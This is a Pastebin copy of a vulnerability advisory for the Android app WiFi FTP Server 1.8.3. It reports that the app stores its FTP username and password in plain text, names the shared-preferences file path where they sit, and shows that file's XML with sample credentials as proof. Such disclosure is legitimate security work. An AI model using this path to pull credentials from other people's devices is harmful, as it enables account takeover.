Ledger Nano X - The secure hardware wallet
SHARE
TWEET

wifiFTPserver

a guest Apr 22nd, 2019 313 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: WiFi FTP Server 1.8.3 - Credential Disclosure
  2. # Date: 2019-04-08
  3. # Software Link: https://play.google.com/store/apps/details?id=com.medhaapps.wififtpserver&hl=en
  4. # Version: 1.8.3 Android App
  5. # Vendor: Medha Apps
  6. # Exploit Author: Loc Phan Van
  7. # CVE: N/A
  8. # Category: Mobile Apps
  9. # Tested on: Android 8.1
  10.  
  11. # Description
  12. # WiFi FTP Server 1.8.3 Insecure Data Storage, the result of storing confidential
  13. # information insecurely on the system i.e. poor encryption, plain text,
  14. # access control issues etc. Attacker can find out username/password of valid user via
  15. # /data/data/com.medhaapps.wififtpserver/shared_prefs/com.medhaapps.wififtpserver_preferences.xml
  16.  
  17. # PoC
  18.  
  19. <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
  20. <map>
  21.     <string name="pref_mount">0</string>
  22.     <string name="pref_theme">0</string>
  23.     <boolean name="pref_show_password" value="true" />
  24.     <boolean name="perf_ftps" value="false" />
  25.     <string name="pref_port">2221</string>
  26.     <boolean name="perf_anon" value="false" />
  27.     <string name="pref_userid">enderphan</string>
  28.     <string name="pref_password">P4sswr0d123</string>
  29.     <string name="pref_ssl_mode">0</string>
  30.     <boolean name="pref_read_only" value="false" />
  31. </map>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top